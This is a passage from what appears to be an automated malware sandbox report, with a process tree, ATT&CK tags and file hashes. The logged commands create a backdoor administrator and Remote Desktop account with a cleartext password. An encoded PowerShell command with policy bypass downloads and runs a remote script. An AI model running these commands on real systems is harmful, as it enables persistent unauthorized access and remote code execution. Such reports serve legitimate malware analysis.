- Suspicious use of WriteProcessMemory
PID:4356
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Kbp89SBQ /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3516
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Kbp89SBQ /add
    3⤵
    PID:1704

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2496
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5012
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    PID:1392

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:484
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1780
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" FSHLRPTB$ /ADD
    3⤵
    PID:1400

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:2800
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:3448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:3972

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Kbp89SBQ
1⤵
PID:4216
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Kbp89SBQ
  2⤵
  PID:4744
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Kbp89SBQ
    3⤵
    PID:3520

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:4836
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2976

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2036
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:3572

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:3524
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:32
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Program Files directory
    - Drops file in Windows directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:308

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Web Service

T1102

Credential Access

Account Manipulation

T1098

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES39FC.tmp

Filesize
1KB

MD5
3aefd4c0d043ec322d9ac33c7b64f67b

SHA1
01c214d3a25fdd5b47fa364cee22cb80f895439d

SHA256
3ac14ece88fdd7a3b3542914b58e67e5429b947b945313c9dba2202ccc1f5ee8

SHA512
9819fb4d983f31f06e082534ed89a64c14828bd1571d61825517cab30b7e513de939dc1f73a245e0522589d835ba879ad8a4b12dcaaee970e5f96518eb6052fb

Download Submit
C:\Users\Admin\AppData\Local\Temp\aj3w4zld\aj3w4zld.dll

Filesize
3KB

MD5
395c8088db52d05347d1a08dcc522e26

SHA1
0ee07ab0410ec4c56465ad2cab46043b4d499d35

SHA256
5d4da6aff431778a0f33028089324ba4c53f786943590bbd3a980d198ec88d4d

SHA512
6797d7c919b4f7bb63b3196d758de3cb535c1ea2917c49ca7a2a31481b06e66315fa981cfaf86c239145c5b47b0627f975e7abc20602773cfffd33c006a5eba4

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1

Filesize
3.0MB

MD5
bcac3bbb18f093dbc8e5e76d2675695f

SHA1
96453f65b41e428937349e6f48fe67d6dfd6a580

SHA256
b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a

SHA512
78c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.zip

Filesize
2.3MB

MD5
42c2a160d2d191e6ffcc1076b4734ee2

SHA1
c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49

SHA256
2b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99

SHA512
3b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
55KB

MD5
f357d4e7b83bc0a41c65d97f3e6f50f4

SHA1
71db3180a8ada6d5d7722c54a5940c3490f78636

SHA256
db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba

SHA512
566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
944KB

MD5
d5de6f599d9807bac2f5a8e751a8c38f

SHA1
9e70edf56b6a5768fda84232e9c557e750d3631b

SHA256
18207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca

SHA512
e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
\??\PIPE\lsarpc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aj3w4zld\CSC9A30BCF8E5F04F30B2E02A1122B3F242.TMP

Filesize
652B

MD5
c2740e6bdd5899efcec7877d72e3fa7c

SHA1
93bc9ea8861c372414aa70688706c5c1e8658f0a

SHA256
26c583b543b14b63552bfde93e89a5da277b9b9fb01540afddb6e866a246df33

SHA512
90bbb526dac617761fa1bb32476a9fb6a1ac1024163ffb03340c777dbbf7e282730ae655ab6b9fa289e5f623fc3fd9b005fab8e5c429d5977edc467e58616945

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aj3w4zld\aj3w4zld.0.cs

Filesize
507B

MD5
6f235215132cdebacd0f793fe970d0e3

SHA1
2841e44c387ed3b6f293611992f1508fe9b55b89

SHA256
ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

SHA512
a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\aj3w4zld\aj3w4zld.cmdline

Filesize
369B

MD5
23829dbb0c8fa6b773bd2f199ae602dc

SHA1
7bab87a4b537eaf9343c0db2eb50f398f69efda9

SHA256
8ff83b441e5325abdc605b8215e655617279de91f600e310f5433226da412e69

SHA512
c6f601b0fe34adb1e6ed7c4d552c683f2911de87a0f98555a6cf035db3099f1a5a29710b72da5ce593d6ecc4905570bab5b32908e405497b58bcebed275bd629

Download Submit
memory/32-186-0x0000000000000000-mapping.dmp

Download
memory/204-137-0x0000000000000000-mapping.dmp

Download
memory/308-187-0x0000000000000000-mapping.dmp

Download
memory/308-188-0x00007FFA4A770000-0x00007FFA4B231000-memory.dmp

Filesize
10.8MB

Download
memory/428-169-0x0000000000000000-mapping.dmp

Download
memory/432-130-0x00000000043DB000-0x0000000004718000-memory.dmp

Filesize
3.2MB

Download
memory/432-133-0x0000000000040000-0x000000000226A000-memory.dmp

Filesize
34.2MB

Download
memory/432-131-0x0000000004720000-0x0000000004BCC000-memory.dmp

Filesize
4.7MB

Download
memory/492-168-0x0000000000000000-mapping.dmp

Download
memory/1388-159-0x0000000000000000-mapping.dmp

Download
memory/1392-173-0x0000000000000000-mapping.dmp

Download
memory/1400-176-0x0000000000000000-mapping.dmp

Download
memory/1408-140-0x0000000000000000-mapping.dmp

Download
memory/1624-158-0x0000000000000000-mapping.dmp

Download
memory/1704-171-0x0000000000000000-mapping.dmp

Download
memory/1780-175-0x0000000000000000-mapping.dmp

Download
memory/1832-153-0x0000000000000000-mapping.dmp

Download
memory/1980-152-0x0000000000000000-mapping.dmp

Download
memory/2248-144-0x0000000000000000-mapping.dmp

Download
memory/2264-149-0x0000000000000000-mapping.dmp

Download
memory/2472-163-0x0000000000000000-mapping.dmp

Download
memory/2500-156-0x0000000000000000-mapping.dmp

Download
memory/2732-146-0x0000000000000000-mapping.dmp

Download
memory/2976-181-0x0000000000000000-mapping.dmp

Download
memory/3080-132-0x0000000000000000-mapping.dmp

Download
memory/3080-134-0x00000201E7AE0000-0x00000201E7B02000-memory.dmp

Filesize
136KB

Download
memory/3080-136-0x00007FFA4A770000-0x00007FFA4B231000-memory.dmp

Filesize
10.8MB

Download
memory/3108-147-0x0000000000000000-mapping.dmp

Download
memory/3448-177-0x0000000000000000-mapping.dmp

Download
memory/3516-170-0x0000000000000000-mapping.dmp

Download
memory/3520-180-0x0000000000000000-mapping.dmp

Download
memory/3572-185-0x0000000000000000-mapping.dmp

Download
memory/3808-148-0x0000000000000000-mapping.dmp

Download
memory/3972-178-0x0000000000000000-mapping.dmp

Download
memory/4056-183-0x0000000000000000-mapping.dmp

Download
memory/4172-155-0x0000000000000000-mapping.dmp

Download
memory/4252-160-0x0000000000000000-mapping.dmp

Download
memory/4312-150-0x0000000000000000-mapping.dmp

Download
memory/4396-154-0x0000000000000000-mapping.dmp

Download
memory/4528-151-0x0000000000000000-mapping.dmp

Download
memory/4548-157-0x0000000000000000-mapping.dmp

Download
memory/4584-161-0x0000000000000000-mapping.dmp

Download
memory/4652-165-0x0000000000000000-mapping.dmp

Download
memory/4692-162-0x0000000000000000-mapping.dmp

Download
memory/4744-179-0x0000000000000000-mapping.dmp

Download
memory/4808-164-0x0000000000000000-mapping.dmp

Download
memory/5012-172-0x0000000000000000-mapping.dmp

Download
memory/5052-184-0x0000000000000000-mapping.dmp

Download